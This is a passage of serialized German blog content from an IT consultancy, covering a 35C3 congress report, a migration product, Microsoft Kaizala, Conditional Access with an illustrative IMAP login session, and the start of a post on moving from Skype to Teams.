ergattern.",[353,2763,2764,2768],{},[356,2765],{"alt":2766,"src":2767},"GKler","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/ccc-jochen-pascal.jpg",[748,2769,2770],{},"Jochen und Pascal vor der Leipziger Messe",[353,2772,2773,2774,2779],{},"Die Agenda des Kongresses ist sehr politisch. Zum Auftakt der Veranstaltung sprach der britische Ökonom Guy Standing und hielt ein Plädoyer für das ",[374,2775,2778],{"href":2776,"rel":2777},"https://media.ccc.de/v/35c3-10021-the_precariat_a_disruptive_class_for_disruptive_times",[378],"bedinungslose Grundeinkommen",". Er sprach sich für konkrete Schritte zu mehr sozialer Gerechtigkeit und die Einführung eines bedingungslosen Grundeinkommens aus. Ein interessanter Denkanstoss zum Jahresabschluss!",[353,2781,2782,2783,2788],{},"Im Anschluss warnte der amerikanische Informatiker Alex Halderman vor möglichen ",[374,2784,2787],{"href":2785,"rel":2786},"https://media.ccc.de/v/35c3-9917-election_cybersecurity_progress_report",[378],"Wahlmanipulationen"," bei den kommenden US-Wahlen im Jahr 2020.",[353,2790,2791,2792,2797,2798,2803],{},"Weitere Themen beschäftigen sich unter anderem mit Biometrie und der digitalen Gesundheitsakte. Für all diejenigen, die nicht dabei sein können, stellt der CCC einen ",[374,2793,2796],{"href":2794,"rel":2795},"https://media.ccc.de/c/35c3",[378],"Livestream"," zur Verfügung. Jenseits des Konferenzprogramms bietet der Kongress Raum für Austausch, Installationen, ",[374,2799,2802],{"href":2800,"rel":2801},"https://en.wikipedia.org/wiki/Lightning_talk",[378],"Lightning Talks"," sowie zahlreiche Workshops. Es gibt auch spezielle Angebote für Kinder und Jugendliche.",[353,2805,2806],{},[356,2807],{"alt":2808,"src":2809},"Installation","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/ccc-installation.jpg",[2548,2811,2813],{"id":2812},"veröffentlichung-neuer-exploits","Veröffentlichung neuer Exploits",[353,2815,2816,2817,2822],{},"Einen wichtigen Teil nimmt natürlich auch dieses Jahr wieder die Veröffentlichung kritischer Sicherheitsprobleme ein. Auch wir bei Glück & Kanja verfolgen diese Vorträge immer mit großer Spannung, denn auch wenn sich der CCC in der Regel vorbildlich an die ",[374,2818,2821],{"href":2819,"rel":2820},"https://fahrplan.events.ccc.de/congress/2018/Fahrplan/events/10011.html",[378],"etischen Standards"," hält und zu einer Veröffentlichung immer auch schon der betroffene Hersteller informiert ist (und damit meist auch bereits ein Patch bereitsteht), so kann es dennoch bedeuten, dass schnell und umfassend gehandelt werden muss.",[353,2824,2825],{},"Bereits am ersten Tag demonstriert ein israelisches Team von Checkpoint auch gleich einen sehr gelungenen Coup: Einen 'Fax-Angriff'. Auch wenn die Idee schon länger kursiert, so ist die Umsetzung auf jeden Fall sehenswert - wir haben hier mal direkt einen Link auf die Demo eingefügt, die zwei Minuten lohnen sich!",[2827,2828],"iframe",{"width":2829,"height":2830,"src":2831,"frameBorder":2832,"allowFullScreen":415},800,450,"https://www.youtube.com/embed/QlSRkUQhwjk?start=2356","0",[353,2834,2835,2836,2841,2842,2846],{},"Für die meisten Kunden von Glück & Kanja ist der Angriff auf Multifunktionsgeräte kein besonderes Risiko, denn die bereits seit langem umgesetzte ",[374,2837,2840],{"href":2838,"rel":2839},"https://cloudblogs.microsoft.com/microsoftsecure/2018/06/14/building-zero-trust-networks-with-microsoft-365/",[378],"Zero-Trust-Network","-Philosophie geht immer von unsicheren Netzen aus und konzentriert sich daher auf die Endgerätesicherheit - der ",[374,2843,2845],{"href":2844},"/de/technologien/100-percent-cloud/","100% Cloud","-Ansatz beweist sich damit erneut als moderne und sichere Strategie. Aber Infrastrukturen, die immer noch auf vermeintlich 'sichere Netze' setzen, sollte der Angriff unbedingt erneut zu denken geben.",{"title":402,"searchDepth":403,"depth":403,"links":2848},[2849],{"id":2812,"depth":403,"text":2813},"Gestern startete der 35. Chaos Communication Congress - kurz 35C3 - in Leipzig unter dem Motto Refreshing Memories. Die viertägige Veranstaltung gehört inzwischen zu einer der größten Hackertreffen der Welt und wächst jedes Jahr weiter. Rund 17.000 Technikfreaks finden sich zusammen, um in zahlreichen Vorträgen und Workshops kritisch die Auswirkungen von Technologie auf die Gesellschaft zu diskutieren.",{"categories":2852,"blogtitlepic":2853,"thumb":2854,"socialimg":2855,"customExcerpt":2856},[410],"head-ccc","thumb-ccc","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-ccc.jpg","Gestern startete der 35. Chaos Communication Congress - kurz 35C3 - in Leipzig unter dem Motto Refreshing Memories. Die viertägige Veranstaltung gehört inzwischen zu einer der größten Hackertreffen der Welt und wächst jedes Jahr weiter.","2018-12-28","/posts/2018-12-28-chaos-communication-congress",{"title":2745,"description":2850},"posts/2018-12-28-chaos-communication-congress",[2862,2863],"CCC","Event","-wxua0YIDed46ypSm0z8TYJlmJmVu0E5TJj8u4glCgk",{"id":2866,"title":2867,"author":191,"body":2868,"cta":3,"description":2946,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":2947,"moment":2953,"navigation":415,"path":2954,"seo":2955,"stem":2956,"tags":2957,"webcast":406,"__hash__":2958},"content_de/posts/2019-01-30-realmigrator.md","Migrate the Unmigratable",{"type":350,"value":2869,"toc":2944},[2870,2889,2895,2902,2909,2916,2921,2928,2935],[353,2871,2872,2873,2876,2877,2880,2881,2884,2885,2888],{},"Unser Produkt ",[374,2874,2071],{"href":2069,"rel":2875},[378]," übernimmt diese Aufgabe für Sie! Es erstellt automatisiert eine ",[433,2878,2879],{},"detaillierte Bestandsliste"," der zu migrierenden Ressourcen und Daten. Basierend auf dieser Datenbasis können dann verschiedene Profile für eine Datenmigration erstellt werden, die in der zweiten Phase ebenfalls automatisiert und ohne Nutzereingriff läuft. ",[433,2882,2883],{},"Lokale Files"," als auch persönliche Home Shares inklusive Verzeichnisstruktur und Favoriten werden dabei zu benutzerspezifischen OneDrives verschoben, ",[433,2886,2887],{},"lokale PST-Files"," werden in Office 365-Postfächer synchronisiert.",[353,2890,2891],{},[356,2892],{"alt":2893,"src":2894},"RealMigrator Flow","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/gk-realmigrator-flow.png",[353,2896,2897,2898,2901],{},"RealMigrator ist dabei eine ",[433,2899,2900],{},"einzelne ausführbare Datei",", die im Benutzermodus läuft. Basierend auf individuellen Konfigurationsmöglichkeiten für Gruppen und Standorte wird mit der Analyse der lokalen Maschinen begonnen, um später einen reibungslosen kontrollierten Upload der Daten in die Cloud vorzunehmen. Nach diesem Vorgang können Nutzer problemlos ein sauberes Windows 10 erhalten, ohne Benutzerdaten zu verlieren. Ihre bevorzugte Unternehmens-Deploymentstrategie wird hierbei berücksichtigt.",[353,2903,2904,2905,2908],{},"Während der Migration können die ",[433,2906,2907],{},"Benutzer ungestört weiterarbeiten",". Ein Tray-Icon signalisiert den laufenden Prozess und informiert auf Knopfdruck über den Zustand des Gerätes. Alles passiert vollautomatisch im Hintergrund unter Berücksichtigung von Download-Bandbreiten und Datenlimits. Dateiänderungen werden dabei kontinuierlich überwacht.",[353,2910,2911,2912,2915],{},"Nach Abschluss der Migration sieht der Benutzer einen anpassbaren ",[433,2913,2914],{},"simplen Finalisierungsdialog",", der dem Benutzer die einzelnen Schritte erklärt. Er kann (optional) selbständig entscheiden, ob der Migrationsprozess nochmal für einige Zeit verschoben wird oder aber alle Daten freigegeben und synchronisiert werden können, und das Gerät dann bereit für das Upgrade ist.",[353,2917,2918],{},[356,2919],{"alt":2893,"src":2920},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/gk-realmigrator-finalize-step.png",[353,2922,2923,2924,2927],{},"Ein webbasiertes ",[433,2925,2926],{},"Administrations-Dashboard"," gibt Überblick über alle Geräte und Synchronisationszustände und hilft den Administratoren, Maschinen nach Netzwerken oder anderen Kriterien zu gruppieren.",[353,2929,2930,2931,2934],{},"In einem kurzen ",[433,2932,2933],{},"How-to Video"," haben wir die wichtigsten Funktionen und Vorteile des RealMigrator Produkts zusammengestellt.",[353,2936,2937],{},[374,2938,2941],{"href":2939,"rel":2940},"https://youtu.be/9goQSudIh7w",[378],[356,2942],{"alt":2893,"src":2943},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/gk-realmigrator-video.png",{"title":402,"searchDepth":403,"depth":403,"links":2945},[],"Unser Produkt RealMigrator übernimmt diese Aufgabe für Sie! Es erstellt automatisiert eine detaillierte Bestandsliste der zu migrierenden Ressourcen und Daten. Basierend auf dieser Datenbasis können dann verschiedene Profile für eine Datenmigration erstellt werden, die in der zweiten Phase ebenfalls automatisiert und ohne Nutzereingriff läuft. Lokale Files als auch persönliche Home Shares inklusive Verzeichnisstruktur und Favoriten werden dabei zu benutzerspezifischen OneDrives verschoben, lokale PST-Files werden in Office 365-Postfächer synchronisiert.",{"categories":2948,"blogtitlepic":2950,"socialimg":2951,"customExcerpt":2952},[2949],"Products","head-realmigrator","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-realmigrator.jpg","Anfang 2020 ist Schluss mit dem allgemeinen Windows 7 Support. Folglich stehen im Moment viele Unternehmen vor der Aufgabe, zügig auf Windows 10 zu migrieren. Als vorbereitende Maßnahme ist es unvermeidlich, sich einen Überblick über Ressourcen und Anforderungen des Unternehmens zu verschaffen. Daher ist eine vollständige Inventarisierung sowohl des Hardwarebestands als auch der eingesetzten Softwareprodukte essentiell notwendig.","2019-01-30","/posts/2019-01-30-realmigrator",{"title":2867,"description":2946},"posts/2019-01-30-realmigrator",[2071],"TIX1aO6a1vDyxALSJCCVrZ6-LUr9wWS_uiEQeu9JVeQ",{"id":2960,"title":2961,"author":97,"body":2962,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":3059,"moment":3065,"navigation":415,"path":3066,"seo":3067,"stem":3068,"tags":3069,"webcast":406,"__hash__":3070},"content_de/posts/2019-02-05-kaizala.md","Microsoft Kaizala - Willkommen im Team",{"type":350,"value":2963,"toc":3057},[2964,2977,2988,2998,3004,3023,3026,3040,3047,3050],[2179,2965,2966],{},[353,2967,2968,2969,2972,2973],{},"Microsoft Kaizala is a simple and secure mobile messaging app for large group communications and work management.\n",[2970,2971],"br",{},"Quelle: ",[374,2974,2975],{"href":2975,"rel":2976},"https://docs.microsoft.com/en-us/office365/kaizala/kaizala-overview",[378],[2179,2978,2979],{},[353,2980,2981,2982,2972,2984],{},"A simple and secure mobile chat app for work.\n",[2970,2983],{},[374,2985,2986],{"href":2986,"rel":2987},"https://products.office.com/en/business/microsoft-kaizala",[378],[353,2989,2990,2991,2993,2994,2997],{},"Chat! Mobiler Chat? Warum Chat, wenn wir heute schon ",[433,2992,855],{}," oder ",[433,2995,2996],{},"Skype for Business"," im Microsoft 365 Portfolio haben? In Kaizala geht es aber nicht nur um Chat. Aufgaben, Umfragen, Teilen von Daten oder das Übermitteln von Rechnungsbelegen sind Funktionen der mobilen Anwendung. Anders als Microsoft Teams (Plazierung im Microsoft \"Inner Loop\") kann man mit Kaizala jede Gruppen- bzw. Organisationsgröße erreichen.",[353,2999,3000],{},[356,3001],{"alt":3002,"src":3003},"Microsoft Kaizala App Screenshots","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/body-google-playstore-summary.jpg",[353,3005,3006,3007,3010,3011,3016,3017,3022],{},"Um das Produkt besser zu verstehen, muss man einen Blick in die Vergangenheit werfen. ",[433,3008,3009],{},"Microsoft Indien"," hatte Mitte 2017 den Service ",[374,3012,3015],{"href":3013,"rel":3014},"https://news.microsoft.com/en-in/microsoft-launches-kaizala-productivity-app-empower-indian-organizations/",[378],"gelaunched",". In der Ankündigung wurde vor allem die Optimierung für die 2G Infrastruktur und der Offline-Support angepriesen. Microsoft Kaizala zielt also auf \"task-based workers\" (vgl. Firstline Workers) ab. Neben Indien wurde der Service auch in Brasilien und den Philippinen angeboten. Durch die Integration in Office 365 wurde die Bereitstellung vereinfacht und die Sichtbarkeit weiter erhöht. Somit ist Kaizala jetzt auch ",[374,3018,3021],{"href":3019,"rel":3020},"https://docs.microsoft.com/de-de/office365/kaizala/regional-availability",[378],"in weiteren Ländern verfügbar",", eine offizielle Verfügbarkeit für Europa und Nordamerika gibt es aktuell noch nicht.",[353,3024,3025],{},"Die technische Integration in Office 365 ist jedoch begrenzt. Unsere Projekte profitieren im Bereich Security von vielen Funktionen des Azure Active Directory. Kaizala geht hier andere Wege. Der Vergleich mit WhatsApp ist besonders hier naheliegend, da beide Angebote die Telefonnummer als primäre Authentifizierung nutzen.",[2179,3027,3028],{},[353,3029,3030,3031,3034,3035,2972,3037],{},"Microsoft Kaizala is a ",[433,3032,3033],{},"phone-number based",", simple, and secure mobile chat app that enables you to connect and coordinate work across your network – your organization, vendors, partners, suppliers, and customers\n",[2970,3036],{},[374,3038,2986],{"href":2986,"rel":3039},[378],[353,3041,3042,3043,3046],{},"An dieser Stelle kommt unweigerlich Yammer ins Gedächtnis. Die erste Integration hatte auch ein ",[433,3044,3045],{},"paralleles Security Model",". Erst Jahre später kam eine Anbindung an das Azure AD. Nach der erzwungenen Anmeldung über die Telefonnummer kann eine Office 365 Identität (AAD) hinzugefügt werden. Gruppen, Chats und Daten, die über das AAD Login bereitgestellt werden, sind natürlich administrativ kontrolliert und integrieren sich mit weiteren AAD Sicherheitsfeatures (z.B. MAM bzw. APP). Bei der Nutzung der aktuell im Preview befindlichen Web-Version von Kaizala muss man sich ebenfalls über die Telefonnummer anmelden und einen Code aus der Kaizala App zur Authentifizierung verwenden.",[353,3048,3049],{},"Kaizala kann für spezielle Zielgruppen ein attraktives Angebot darstellen. In unseren 100% Cloud Projekten gehört es (noch) nicht zum Standard Workload von Microsoft 365.",[353,3051,3052,3053,456],{},"Microsoft stellt auf folgender Website ein Demo der mobilen Anwendung bereit: ",[374,3054,3055],{"href":3055,"rel":3056},"https://kaizalademo.office.com/",[378],{"title":402,"searchDepth":403,"depth":403,"links":3058},[],{"categories":3060,"blogtitlepic":3061,"thumb":3062,"socialimg":3063,"customExcerpt":3064},[534],"head-kaizala","thumb-kaizala","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-kaizala.png","Microsoft Kaizala wurde einst als MS Garage Project gestartet und war nur für Android verfügbar. Seit Ende 2018 gehört Kaizala zum offiziellen Angebot innerhalb Office 365. Für unsere Kunden im Microsoft 365 Stack bedeutet es also, dass man sich wie üblich (dank Evergreen) mit solchen neuen Services beschäftigen muss. Was ist also Microsoft Kaizala?","2019-02-05","/posts/2019-02-05-kaizala",{"title":2961,"description":402},"posts/2019-02-05-kaizala",[534,1408,964],"c78M73rs2MODfpAM5BgjbqROdG82xF97yce9K9yknV8",{"id":3072,"title":3073,"author":3074,"body":3075,"cta":3,"description":3283,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":3284,"moment":3290,"navigation":415,"path":3291,"seo":3292,"stem":3293,"tags":3294,"webcast":406,"__hash__":3298},"content_de/posts/2019-02-27-conditional-access.md","Zugriffssteuerung mit Conditional Access",[1630,186],{"type":350,"value":3076,"toc":3275},[3077,3084,3090,3094,3101,3105,3111,3116,3120,3124,3146,3150,3157,3160,3163,3166,3177,3184,3190,3205,3212,3215,3221,3225,3228,3231,3235,3238,3245,3249,3252,3255,3259,3262,3266],[353,3078,3079,3080,3083],{},"Conditional Access ist aus gutem Grund das meistgenutzte Produkt der ",[433,3081,3082],{},"Enterprise Mobility Suite (EMS)"," von Microsoft: Die Identität ist in einer Cloud- und servicebasierten IT-Infrastruktur der Dreh- und Angelpunkt der Sicherheit. Alle Dienste werden über die Identität abgesichert. Das bedeutet einerseits, dass ein Angreifer mit der richtigen gestohlenen Identität alle Absicherungen und Verschlüsselungen aushebeln kann -- aus Sicht des Dienstes darf der Angreifer ja auf alles zugreifen und alles entschlüsseln. Umgekehrt gibt es keine Server und Netzwerke mehr, die ein Angreifer übernehmen könnte -- nur ständig gewartete und rund um die Uhr von Sicherheitsspezialisten überwachte Cloud-Systeme.",[353,3085,3086,3087,456],{},"In diesem Blog-Artikel geht es darum, ",[433,3088,3089],{},"was Conditional Access ist, warum und wie man es einsetzt",[629,3091,3093],{"id":3092},"authentifizierung-gestern-und-heute","Authentifizierung gestern und heute",[353,3095,3096,3097,3100],{},"Ein weit verbreitetes Protokoll zwischen Mailclients und -servern ist ",[433,3098,3099],{},"IMAP",". Es ist einfach, zu einem IMAP Server zu verbinden, einzuloggen, die Inbox zu selektieren und wieder auszuloggen:",[3102,3103,3104],"pre",{},"john@host:~$ telnet 172.16.1.2 143\nTrying 172.16.1.2...\nConnected to 172.16.1.2.\nEscape character is '^]'.\n",[353,3106,3110],{"className":3107},[3108,3109],"triangle-isosceles","left","OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot ready.",[353,3112,3115],{"className":3113},[3108,3114],"right","a001 login john secretpassword",[353,3117,3119],{"className":3118},[3108,3109],"a001 OK [CAPABILITY ...] Logged in",[353,3121,3123],{"className":3122},[3108,3114],"a002 select inbox",[353,3125,3127,3128,3130,3131,3133,3134,3136,3137,3139,3140,3142,3143,3145],{"className":3126},[3108,3109],"FLAGS (\\Answered \\Flagged \\Deleted \\Seen \\Draft)",[2970,3129],{},"\nOK [PERMANENTFLAGS (\\Answered \\Flagged \\Deleted \\Seen \\Draft \\*)] Flags permitted.",[2970,3132],{},"\n0 EXISTS",[2970,3135],{},"\n0 RECENT",[2970,3138],{},"\nOK [UIDVALIDITY 1550581823] UIDs valid",[2970,3141],{},"\nOK [UIDNEXT 1] Predicted next UID",[2970,3144],{},"\na002 OK [READ-WRITE] Select completed (0.000 + 0.000 secs).",[353,3147,3149],{"className":3148},[3108,3114],"a003 logout",[353,3151,3153,3154,3156],{"className":3152},[3108,3109],"BYE Logging out",[2970,3155],{},"\na003 OK Logout completed (0.000 + 0.000 secs).",[3102,3158,3159],{},"Connection closed by foreign host.\njohn@host:~$\n",[353,3161,3162],{},"Entscheidend für die Authentifizierung ist eine kurze Zeile:",[3102,3164,3165],{},"a001 login john secretpassword\n",[353,3167,3168,3169,3172,3173,3176],{},"Mehr als der ",[433,3170,3171],{},"Benutzername (john)"," und das ",[433,3174,3175],{},"Passwort (secretpassword)"," wird für die Authentifizierung nicht benötigt. So wie in diesem Beispiel bei IMAP reichte in der Vergangenheit ein kompromittiertes Paar aus Benutzername und Passwort in vielen Fällen aus, um an die Daten eines Benutzers zu gelangen.",[353,3178,3179,3180,3183],{},"Neben dem schwachen Schutz der Identität nur durch ein Passwort haben solche und ähnliche als ",[433,3181,3182],{},"Legacy Authentication"," bezeichneten Authentifizierungsvorgänge einen weiteren erheblichen Nachteil: Eine unternehmensinterne, zentrale Identitätsverwaltung, wie zum Beispiel Active Directory, hat technische Grenzen, die nicht überschritten werden können. Daraus resultiert eine Fragmentierung bei der Verwaltung von Identitäten auf verschiedenen Systemen; Benutzernamen und Passwörter müssen an verschiedenen Stellen gepflegt werden.",[353,3185,3186,3189],{},[433,3187,3188],{},"Neuere Authentifizierungsprotokolle"," adressieren die Bedürfnisse einer modernen IT Landschaft.",[367,3191,3192,3199,3202],{},[370,3193,3194,3195,3198],{},"Ein weltweit erreichbares zentrales System zur Verwaltung von Identitäten, mit denen auch der Zugriff auf Fremddienste möglich ist. Ziel ist, ",[433,3196,3197],{},"alle"," Zugriffe über eine einzige Identität zu autorisieren (Single Sign-on).",[370,3200,3201],{},"Absicherung der Authentifizierungsvorgänge durch einen zweiten Faktor, so dass ein kompromittiertes Paar aus Benutzername und Passwort alleine nicht mehr für einen Angriff ausreicht.",[370,3203,3204],{},"Administratoren können zusätzliche schwächere oder stärkere Bedingungen für die Authentifizierung definieren, je nach Schutzbedarf der Dienste und Daten.",[353,3206,3207,3208,3211],{},"Die Lösung sind ",[433,3209,3210],{},"tokenbasierte, claims-orientierte Authentifizierungsprotokolle",". Frühere Implementierungen solcher Protokolle, wie WS-Federation und SAML, sind teilweise noch weit verbreitet und werden auch von Microsoft Azure AD unterstützt, aber nicht mehr innovativ weiterentwickelt. OAuth2 und OpenID Connect sind aus heutiger Sicht die Protokolle der Zukunft.",[353,3213,3214],{},"Microsoft setzt mit Azure AD als Identitätsprovider voll auf OAuth2 und OpenID Connect. Azure AD bietet mit Conditional Access ein Gerüst, mit dem flexibel die Bedingungen für die Authentifizierung bei unterschiedlichen Diensten definiert werden können.",[353,3216,3217],{},[356,3218],{"alt":3219,"src":3220},"Conditional access architectural diagram","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/ca-diagram-1.png",[629,3222,3224],{"id":3223},"sinnvolle-regeln","Sinnvolle Regeln",[353,3226,3227],{},"Bei der Sicherung der Identität bietet Conditional Access mit jeder weiteren Regel einen Sicherheitsgewinn, mal in kleinen, mal in größeren Schritten. Mit ein paar Klicks aktiviert man schon die vordefinierte Regel, die Multifaktorauthentifizierung für Administratoren erzwingt.",[353,3229,3230],{},"Eine andere sinnvolle Regel wäre es, für die Anmeldung außerhalb des Unternehmensnetzes entweder ein modernes, sicheres Gerät (\"Compliant Device\") zu verlangen oder MFA. Veraltete Authentifizierugsmethoden, etwa IMAP, die gar keine Prüfung auf das \"Compliant Device\"-Flag und MFA zulassen, sollte man mit einer weiteren Regel ausschalten.",[629,3232,3234],{"id":3233},"fallstricke","Fallstricke",[353,3236,3237],{},"Ein gut abgestimmtes Gesamtregelwerk zu definieren, hat aber auch seine Tücken. Zum Beispiel kann der Account für AAD Connect kein MFA, wodurch die Synchronisation zwischen dem AD on-premises und dem AAD in der Cloud nicht mehr funktioniert, wenn der entsprechende Account nicht aus den Regeln ausgenommen wird.",[353,3239,3240,3241,3244],{},"Im letzten November fiel Microsofts MFA-Dienst mehrere Tage aus. Eine Anmeldung mit Administrator-Konten war deswegen unmöglich, normale Nutzer konnten meist noch halbwegs weiterarbeiten, solange kein MFA erforderlich wurde. Microsoft setzte danach verschiedene Maßnahmen zur Qualitätsverbesserung um. Aber sollte man deswegen einfach die Daumen drücken und hoffen, dass so ein Problem nicht erneut auftritt? Schon vor dem Ereignis empfahl Microsoft bei den Administratoren einen sogenannten ",[433,3242,3243],{},"Break-Glass-Account"," vom MFA-Zwang auszunehmen. Mit diesem Account kann man fix die MFA-Regel ausschalten und somit ein paar Tage ohne MFA arbeiten.",[629,3246,3248],{"id":3247},"umsetzung","Umsetzung",[353,3250,3251],{},"Aus unserer Erfahrung sollte man zur Konfiguration eines Conditional-Access-Regelwerks zunächst klar definieren, welche Anforderungen man hat: Welche Arten von Mobilgeräten sind zugelassen? Dürfen Nutzer ihre privaten Systeme nutzen, sei es zu Hause oder von öffentlichen Terminals? Gibt es \"unsichere\" Altgeräte, die keine modernen Authentifizierungsprotokolle unterstützen, aber Cloud-Dienste nutzen sollen?",[353,3253,3254],{},"Diese Anforderungen kann man zunächst unabhängig von der konkreten Umsetzung in Conditional Access aufstellen. Wahrscheinlich sehen die Regeln in Conditional Access später anders aus. Manche Regel, die in natürlicher Sprache klar abgegrenzt wirkt, bildet in Conditional Access besser ein Regelpaar. Andere Regeln lassen sich in Conditional Access zusammenfassen, wodurch sie allgemeingültiger werden und dadurch einerseits einfacher zu verstehen sind, andererseits robuster gegenüber zukünftigen Veränderungen sind.",[629,3256,3258],{"id":3257},"grundregelwerk","Grundregelwerk",[353,3260,3261],{},"Wir haben gute Erfahrungen damit gemacht, unseren Kunden ein Grundregelwerk zu empfehlen, das je nach Anforderungen noch im Detail angepasst wird. Mit unseren Kollegen tauschen wir uns dazu regelmäßig aus und pflegen in unserem G&K-Cloud-Blueprint ein ständig aktualisiertes \"Musterregelwerk\". So fließen Erfahrungen der Kunden zurück in das Musterregelwerk und kommen auch anderen Kunden zu Gute. Außerdem fällt es uns als Gruppe leichter, die zahlreichen Entwicklungen bei Conditional Access und anderen Cloud-Produkten nachzuvollziehen und mit entsprechenden Conditional-Access-Regeln umzusetzen.",[629,3263,3265],{"id":3264},"mehr-zu-conditional-access","Mehr zu Conditional Access",[353,3267,3268,3269,3274],{},"In den nächsten Wochen werden wir einen ausführlicheren, technischen Artikel zur Umsetzung von Conditional Access veröffentlichen und in einem Webcast erklären. Mehr demnächst auf ",[374,3270,3273],{"href":3271,"rel":3272},"https://glueckkanja.com",[378],"glueckkanja.com","!",{"title":402,"searchDepth":403,"depth":403,"links":3276},[3277,3278,3279,3280,3281,3282],{"id":3092,"depth":704,"text":3093},{"id":3223,"depth":704,"text":3224},{"id":3233,"depth":704,"text":3234},{"id":3247,"depth":704,"text":3248},{"id":3257,"depth":704,"text":3258},{"id":3264,"depth":704,"text":3265},"Conditional Access ist aus gutem Grund das meistgenutzte Produkt der Enterprise Mobility Suite (EMS) von Microsoft: Die Identität ist in einer Cloud- und servicebasierten IT-Infrastruktur der Dreh- und Angelpunkt der Sicherheit. Alle Dienste werden über die Identität abgesichert. Das bedeutet einerseits, dass ein Angreifer mit der richtigen gestohlenen Identität alle Absicherungen und Verschlüsselungen aushebeln kann -- aus Sicht des Dienstes darf der Angreifer ja auf alles zugreifen und alles entschlüsseln. Umgekehrt gibt es keine Server und Netzwerke mehr, die ein Angreifer übernehmen könnte -- nur ständig gewartete und rund um die Uhr von Sicherheitsspezialisten überwachte Cloud-Systeme.",{"categories":3285,"blogtitlepic":3286,"thumb":3287,"socialimg":3288,"customExcerpt":3289},[1117],"head-conditional-access","thumb-conditional-access","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-conditional-access.jpg","Conditional Access ist aus gutem Grund das meistgenutzte Produkt der Enterprise Mobility Suite (EMS) von Microsoft: Die Identität ist in einer Cloud- und servicebasierten IT-Infrastruktur der Dreh- und Angelpunkt der Sicherheit.","2019-02-27","/posts/2019-02-27-conditional-access",{"title":3073,"description":3283},"posts/2019-02-27-conditional-access",[3295,1772,1117,3296,3297],"Conditional Access","EMS","Blueprint","0f2UPx7DPxxw2gJVTn-P4_kDZL-gckI1sEk2h0m7oIY",{"id":3300,"title":3301,"author":48,"body":3302,"cta":3,"description":3537,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":3538,"moment":3544,"navigation":415,"path":3545,"seo":3546,"stem":3547,"tags":3548,"webcast":406,"__hash__":3551},"content_de/posts/2019-03-20-skype-to-teams.md","Skypst Du noch oder teamst Du schon?",{"type":350,"value":3303,"toc":3535},[3304,3325,3338,3347,3358,3365,3371,3374,3380,3383,3389,3392,3399,3406,3416,3435,3441,3479,3514,3525,3532],[353,3305,3306,3307,3310,3311,3313,3314,3316,3317,3320,3321,3324],{},"Lange waren ",[433,3308,3309],{},"Communication & Collaboration"," für uns zwei getrennte Welten, und wir benutzten unterschiedliche Anwendungen für die Zusammenarbeit mit unseren Kunden und Partnern wie auch mit den Kollegen in internen Projekten. Für unsere gesamte Kommunikation basierend auf Chat, Audio- sowie Videoanrufen hatten wir über die Jahre ",[433,3312,2996],{}," lieben gelernt. Unsere Zusammenarbeit organisierten wir hingegen über E-Mail (",[748,3315,874],{},"), Team-Sites (",[748,3318,3319],{},"Share Point",") und unlängst auch über moderne Gruppen (",[748,3322,3323],{},"Office 365 Groups",") beispielsweise für die Terminplanung innerhalb eines Projektes. Diese Vielzahl an Anwendungen machte es mitunter schwierig, den Überblick zu behalten, zumal sie sich auch nicht immer reibungslos miteinander integrieren ließen.",[353,3326,3327,3328,3330,3331,456],{},"Mit der Einführung von ",[433,3329,855],{}," bekam das Ganze nicht nur ein neues Look & Feel, vielmehr wurde auf diesen etablierten Säulen eine neue Plattform gebaut, die unter einer Oberfläche alle Funktionen und Möglichkeiten aus den bewährten Services bereitstellte – Microsoft definierte diese neue Art der Kommunikation und Zusammenarbeit als ",[374,3332,3335],{"href":3333,"rel":3334},"https://www.microsoft.com/en-us/microsoft-365/blog/2017/09/25/a-new-vision-for-intelligent-communications-in-office-365/",[378],[433,3336,3337],{},"Intelligent Communications",[353,3339,3340,3341,3346],{},"Im August 2018 wurde von Microsoft bekanntgegeben, dass die Feature-Parität zu Skype for Business erreicht sei: ",[374,3342,3345],{"href":3343,"rel":3344},"https://techcommunity.microsoft.com/t5/Microsoft-Teams-Blog/Microsoft-Teams-is-now-a-complete-meeting-and-calling-solution/ba-p/236042",[378],"Microsoft Teams is now a complete meeting and calling solution",". Ein Schritt, der Skype for Business in den Schatten stellte und Teams nicht nur für die Kommunikation sondern auch für die Telefonie zum Tool der Wahl machte. Doch was zeigt uns die Realität, und wie sieht es bei uns und unseren Kunden aktuell tatsächlich aus? Dieser Artikel soll die aktuellen Entwicklungen rund um Teams beleuchten.",[353,3348,3349,3350,3353,3354,3357],{},"Bei Glück & Kanja haben wir den Schritt schon früh gewagt und Teams zu unserer führenden Anwendung für Communication & Collaboration gemacht. Alle unsere Benutzer wurden auf den sogenannten ",[433,3351,3352],{},"Teams Only-Mode"," geschaltet. Damit wurde Teams der führende Client für die gesamte Kommunikation inklusive der Festnetztelefonie. Eingehende Anrufe und Chatnachrichten werden somit direkt im Teams Client signalisiert. Meetings werden nun vollständig über den Teams Client und nicht mehr über Skype for Business abgehalten. Da Teams von Grund auf neu entwickelt wurde, basiert es auf einer ",[433,3355,3356],{},"komplett cloudbasierten Infrastruktur",", welche eine webbasierte Unterstützung in allen Betriebssystemen ermöglicht und somit auch dem mobilen Einsatz nichts im Wege steht. Die Installation von einem Client oder einem Plug-In gehören 